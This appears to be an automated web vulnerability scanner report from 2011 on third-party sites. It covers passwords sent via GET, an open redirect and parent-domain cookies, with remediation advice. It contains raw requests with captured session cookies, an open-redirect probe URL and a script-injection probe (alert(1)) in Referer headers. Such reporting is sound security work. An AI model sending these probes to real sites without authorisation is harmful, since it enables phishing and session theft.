GET /s/ HTTP/1.1 Host: www.amazon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:48:21 GMT Server: Server x-amz-id-1: 1B5Q0P8RKVGQFA9NY3SE p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC " x-amz-id-2: nI6zZw+w2fEj6f+WxBnPsVapnrhlNWadEc8XUA04/cH3a6X/znrumVfUTZLfgypT Vary: Accept-Encoding,User-Agent Content-Type: text/html; charset=ISO-8859-1 Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT Set-cookie: session-id=183-0423924-6403059; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT Content-Length: 83315
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html dir="ltr"><head><title>Blogger: Penetration Testing | Hoyt LLC - Post a Comment</title> <link href="http ...[SNIP]...
GET /in/troyd/x22 HTTP/1.1 Host: www.linkedin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Server: Apache-Coyote/1.1 Set-Cookie: bcookie="v=1&0cafcf8d-e068-4822-b520-7439b567b823"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Tue, 21-Feb-2079 23:39:36 GMT; Path=/ Last-Modified: Thu, 27 Jan 2011 18:58:16 GMT If-Modified-Since: Thu, 27 Jan 2011 18:58:16 GMT Set-Cookie: lang="v=2&lang=en"; Version=1; Domain=linkedin.com; Path=/ Content-Type: text/html;charset=UTF-8 Content-Language: en-US Date: Thu, 03 Feb 2011 20:25:29 GMT X-Cache: MISS from www.linkedin.com X-Cache-Lookup: MISS from www.linkedin.com:8080 Via: 1.0 www.linkedin.com (squid/3.0.STABLE20) Connection: close
The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passords into the URL increases the risk that they will be captured by an attacker.
Issue remediation
All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.
The page contains a form with the following action URL, which is submitted using the GET method:
http://www.butterscotch.com/?src=tcv3video
The form contains the following password field:
password
Request
GET /?src=tcv3video HTTP/1.1 Host: www.butterscotch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL, which is submitted using the GET method:
http://www.butterscotch.com/signup.html
The form contains the following password fields:
password
password2
Request
GET /?src=tcv3video HTTP/1.1 Host: www.butterscotch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL, which is submitted using the GET method:
http://www.butterscotch.com/signup.html
The form contains the following password fields:
password
password2
Request
GET /tutorials.html HTTP/1.1 Host: www.butterscotch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL, which is submitted using the GET method:
http://www.butterscotch.com/tutorials.html
The form contains the following password field:
password
Request
GET /tutorials.html HTTP/1.1 Host: www.butterscotch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the r request parameter is used to perform an HTTP redirect. The payload http%3a//afad3d0d022d23a44/a%3f was submitted in the r parameter. This caused a redirection to the following URL:
http://afad3d0d022d23a44/a?
Issue background
Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targetting the correct domain with a valid SSL certificate (if SSL is used) lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.
Issue remediation
If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:
Remove the redirection function from the application, and replace links to it with direct links to the relevant target URLs.
Maintain a server-side list of all URLs that are permitted for redirection. Instead of passing the target URL as a parameter to the redirector, pass an index into this list.
If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:
The application should use relative URLs in all of its redirects, and the redirection function should strictly validate that the URL received is a relative URL.
The application should use URLs relative to the web root for all of its redirects, and the redirection function should validate that the URL received starts with a slash character. It should then prepend http://yourdomainname.com to the URL before issuing the redirect.
The application should use absolute URLs for all of its redirects, and the redirection function should verify that the user-supplied URL begins with http://yourdomainname.com/ before issuing the redirect.
Request
GET /a/bpix?adv=1050&id=5&r=http%3a//afad3d0d022d23a44/a%3f HTTP/1.1 Host: ad.trafficmp.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
The following cookies were issued by the application and is scoped to a parent of the issuing domain:
session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=176-9787580-1042565; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /SmartDraw-com-SDS11-SmartDraw-2010/dp/B002OG5QUC/x22 HTTP/1.1 Host: www.amazon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:48:21 GMT Server: Server x-amz-id-1: 1KMV2BXDN94S7KQ0JZ7S p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC " x-amz-id-2: q5mVjA3yFvZi2IuxLAukAm69vnbnuFICbsgIGuLZMtThRGfrgK3+KrMswERBq2Ak Vary: Accept-Encoding,User-Agent Content-Type: text/html; charset=ISO-8859-1 Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT Set-cookie: session-id=176-9787580-1042565; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT Content-Length: 350615
The following cookies were issued by the application and is scoped to a parent of the issuing domain:
session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=183-0423924-6403059; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /s/ HTTP/1.1 Host: www.amazon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:48:21 GMT Server: Server x-amz-id-1: 1B5Q0P8RKVGQFA9NY3SE p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC " x-amz-id-2: nI6zZw+w2fEj6f+WxBnPsVapnrhlNWadEc8XUA04/cH3a6X/znrumVfUTZLfgypT Vary: Accept-Encoding,User-Agent Content-Type: text/html; charset=ISO-8859-1 Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT Set-cookie: session-id=183-0423924-6403059; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT Content-Length: 83315
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /c/mm49ryk/a-b-c-development-company-inc/x22 HTTP/1.1 Host: www.manta.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /c/mm8136k/abc-development-inc/x22 HTTP/1.1 Host: www.manta.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /Modules/PostTo/Pages/ HTTP/1.1 Host: www.myspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="/auth/loginform?dest=http%3a%2f%2fwww.myspace.com%2fModules%2fPostTo%2fPages%2fdefault.aspx%3fu%3dhttp%253a%252f%252f ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /licenses/mit-license.php HTTP/1.1 Host: www.opensource.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /productxml/?QuickList=1&ProductURL=Y&ShortName=Y&keywords=12370379&ThumbnailURL=Y HTTP/1.1 Host: www.overstock.com Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1787227/3-inBannerVideo2011_ViPrPf_New.swf?clickTag=http%3A%2F%2Fad.doubleclick.net%2Fclick%253Bh%253Dv8%2F3aa3%2F3%2F0%2F%252a%2Ff%253B234670317%253B0-0%253B0%253B58524542%253B4307-300%2F250%253B40113270%2F40131057%2F2%253Bu%253D%252Clb-1482036_1296770433%252C11d765b6a10b1b3%252Cnone%252Can.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1%253B%257Efdr%253D234572024%253B0-0%253B0%253B32934908%253B4307-300%2F250%253B40173662%2F40191449%2F1%253Bu%253D%252Clb-1482036_1296770433%252C11d765b6a10b1b3%252Cnone%252Can.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1%253B%257Esscs%253D%253f&xmlFile=InBannerVideo_ViPrPf_LongboardVA_ronQ1.xml&taxonomyId=2&taxonomyType=sto&productCID=654321&keywords=&skus=12370379|12958970|11254000|12370390|10927901|11915556|13002490|10738953|12970899|12532546|12130097|12753446|11551645|066987|11144650|10355113|13197342|12941235|12370383|12978335|12453900 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /submit HTTP/1.1 Host: www.stumbleupon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webplayed.xml?action=PlayerLoaded&videoSequence=1&userWhoEmbedded=anonymous&playSequence=0&collectionId=&autoPlay=true&percent=&playerVersion=flash/VeohPlayer-Freewheel.7.0.0.40&player=videodetails&inVeoh=true&flashVersion=WIN%2010,1,103,20&affiliateId=&cachebuster=0.22769851004704833&apiId=0E13378F-874E-DB67-3E0B-113A55BC57F9&positionTime=0&volumeLevel=NaN&totalVideos=1&truncated=false&videoId=18978294&idSource=veoh&bufferStateEntered=0&userTime=2.565&playTime=0&bufferTime=0&stopTime=2.565&pauseTime=0&playerSessionID=e5df0bf7-4865-174d-7ab5-b481ea4a57e3&client=false HTTP/1.1 Host: www.veoh.com Proxy-Connection: keep-alive Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: veohCookie="VisitorUID=F28E893B-ED80-1EAE-894D-FC564C4FF0AB&LastUpdate=03/Feb/2011:12:31:55 -0800&first=0"; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utmv=; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __utmb=91933981.1.10.1296766388; vvt="1&Fri, 04 Feb 2011 20:53:09 GMT"; __qca=P0-1750536792-1296766390251; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; JSESSIONID=FA513D5C45F8F3409631CA9302C4270B
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /media/redir.php?prof=88&camp=4679&affcode=cr197235&cid=7085856551|166328|SmartDraw&mType=e&networkType=search&url[]=http%3A%2F%2Finfo.mindjet.com%2FMindManagerB.html%3Fcmpg%3DAmericas_-_Google_US_Competitors/x22 HTTP/1.1 Host: 102.xg4ken.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Thu, 03 Feb 2011 20:31:19 GMT Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/4.3.9 Set-Cookie: kenshoo_id=6de8bdeb-6bd9-2909-a31c-000018710444; expires=Wed, 04-May-2011 20:31:19 GMT; path=/; domain=.xg4ken.com Location: http://info.mindjet.com/MindManagerB.html?cmpg=Americas_-_Google_US_Competitors/x22 P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW" Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
The following cookies were issued by the application and is scoped to a parent of the issuing domain:
_uid="a104_5562153497824379009";expires=Fri, 03 Feb 2012 21:07:44 GMT;domain=.fwmrm.net;path=/;
_auv="g12288~1.1296767264.0,12720.1296767264.0,^";expires=Sat, 05 Mar 2011 21:07:44 GMT;domain=.fwmrm.net;path=/;
_cvr="1296767264^11894^sg12288~sg11948^0~0^0.000000~5.000000,";expires=Sat, 05 Mar 2011 21:07:44 GMT;domain=.fwmrm.net;path=/;
_vr="1296767252.0+7564699552021921.248599~249349~331220~,";expires=Sat, 05 Mar 2011 21:07:44 GMT;domain=.fwmrm.net;path=/;
_sc="sg12288.1296767252.1296767264.28800.0.5,";expires=Sat, 05 Mar 2011 21:07:44 GMT;domain=.fwmrm.net;path=/;
_wr="g12288";expires=Sat, 05 Mar 2011 21:07:44 GMT;domain=.fwmrm.net;path=/;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
_uid="a104_5562153497824379009";expires=Fri, 03 Feb 2012 21:07:32 GMT;domain=.fwmrm.net;path=/;
_vr="1296767252.0+7564699552021921.248599~249349~331220~,";expires=Sat, 05 Mar 2011 21:07:32 GMT;domain=.fwmrm.net;path=/;
_sc="sg12288.1296767252.1296767252.28800.0.0,";expires=Sat, 05 Mar 2011 21:07:32 GMT;domain=.fwmrm.net;path=/;
_wr="g12288";expires=Sat, 05 Mar 2011 21:07:32 GMT;domain=.fwmrm.net;path=/;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Sports/wireStory HTTP/1.1 Host: abcnews.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:31:26 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: abc05 X-Powered-By: ASP.NET Set-Cookie: SWID=B93EDC68-F596-4509-B1FC-2C48F519C999; path=/; expires=Thu, 03-Feb-2031 20:31:23 GMT; domain=.go.com; Content-Length: 7679 Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en">
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 04 Feb 2011 02:44:40 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ad/N3671.msnmidfunnel.com/B5159652.21;sz=1x1;pc=%5BTPAS_ID%5D;ord=2013940297? HTTP/1.1 Accept: */* Referer: http://www.msn.com/ Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: ad.doubleclick.net Proxy-Connection: Keep-Alive
Response
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Date: Fri, 04 Feb 2011 02:29:40 GMT Location: http://s0.2mdn.net/viewad/998766/49-1x1.gif Cache-Control: no-cache Pragma: no-cache Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 04 Feb 2011 02:44:40 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Server: GFE/2.0 Content-Type: text/html
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ad/N6421.152847.MSN.COM/B5094800.20;abr=!ie4;abr=!ie5;sz=1x1;ord=1362100664? HTTP/1.1 Accept: */* Referer: http://www.msn.com/ Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: ad.doubleclick.net Proxy-Connection: Keep-Alive
Response
HTTP/1.1 302 Found P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Fri, 04 Feb 2011 02:29:41 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-cache, must-revalidate Location: http://s0.2mdn.net/viewad/2850237/1x1.gif Content-Type: image/gif Set-Cookie: test_cookie=CheckForPermission; expires=Fri, 04-Feb-2011 02:44:41 GMT; path=/; domain=.doubleclick.net X-Content-Type-Options: nosniff Server: cafe Content-Length: 0 X-XSS-Protection: 1; mode=block
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/bpix?adv=1050&id=5&r= HTTP/1.1 Host: ad.trafficmp.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/bpix?adv=1050&id=5&r= HTTP/1.1 Host: ad.trafficmp.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_h9m4=h0l%3A86c%3A1; T_4mpe=h0h%3A86c%3A1; T_3q8t=h0l%3A86c%3A1; T_ax3f=h0h%3A86c%3A1; dly2=3-lg2agz-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2agz-1~1b4ykgj40t72i~i9b~4fqb~0-1~14288lsu2vxsy~i97~4fq7~q-1~1aao14q745q7r~i9b~4fqb~q-1~15stqp6ba7xf0~i9b~4fqb~13-; rth=2-lg22an-h0h~86c~1~1-h0l~86c~1~1-9tc~0~1~1-
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/bpix?adv=1050&id=5&r= HTTP/1.1 Host: ad.trafficmp.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/js?plid=23659 HTTP/1.1 Host: ad.trafficmp.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-28103178_1296770408,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;kw=reviews%2F59ab9%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e54375ce26%2Fx22;pos=btf;tile=5;sz=160x600;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296769784? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_ahzq=h0l%3A85m%3A1; T_km24=h0h%3A85m%3A1; dly2=3-lg2ag9-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2ag9-1~1aao14q745q7r~i9b~4fqb~0-1~15stqp6ba7xf0~i9b~4fqb~d-; rth=2-lg22an-h0h~85m~1~1-h0l~85m~1~1-9tc~0~1~1-
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/js?plid=23663 HTTP/1.1 Host: ad.trafficmp.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-5843489_1296770394,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;pos=atf;tile=1;dcopt=ist;sz=728x90;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296770389? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: T_4ffd=9tc%3A0%3A1; rth=2-lg22an-9tc~0~1~1-; uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/js?plid=23663 HTTP/1.1 Host: ad.trafficmp.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-14847884_1296770433,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;kw=reviews%2F59ab9%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e54375ce26%2Fx22;pos=atf;tile=1;dcopt=ist;sz=728x90;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296769784? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_fg2y=h0l%3A85m%3A1; T_73th=h0h%3A85m%3A1; dly2=3-lg2ag9-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2ag9-1~14288lsu2vxsy~i97~4fq7~0-1~1aao14q745q7r~i9b~4fqb~0-1~15stqp6ba7xf0~i9b~4fqb~d-; 